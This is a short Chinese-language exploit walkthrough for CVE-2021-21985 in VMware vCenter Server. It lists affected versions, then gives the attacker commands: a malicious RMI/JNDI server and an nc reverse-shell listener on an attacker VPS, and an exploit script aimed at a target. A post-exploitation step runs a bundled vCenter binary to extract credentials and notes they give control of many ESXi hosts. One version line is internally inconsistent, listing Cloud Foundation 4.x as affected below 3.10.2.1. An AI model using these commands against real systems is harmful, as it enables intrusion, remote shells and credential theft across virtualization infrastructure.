受影响的版本:
VMware vCenter Server 7.0系列 < 7.0.U2b
VMware vCenter Server 6.7系列 < 6.7.U3n
VMware vCenter Server 6.5系列 < 6.5 U3p
VMware Cloud Foundation 4.x 系列 < 4.2.1
VMware Cloud Foundation 4.x 系列 < 3.10.2.1
漏洞复现
vps
java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer x.x.x.x
nc -lvvp 5555
attack
python3 CVE-2021-21985_exp.py https://x.x.x.x rmi://x.x.x.x:1097/ExecByEL
后续利用
cd /usr/lib/vmware-perfcharts/wrapper/bin
cp vcpe-linux-amd64 /tmp/vcpe-linux-amd64
cd /tmp
chmod +x vcpe-linux-amd64
./vcpe-linux-amd64
可以使用此账号密码登录exsi控制大量机器
参考文章
https://github.com/r0ckysec/CVE-2021-21985
https://github.com/xnianq/cve-2021-21985_exp
https://s.tencent.com/research/bsafe/1314.html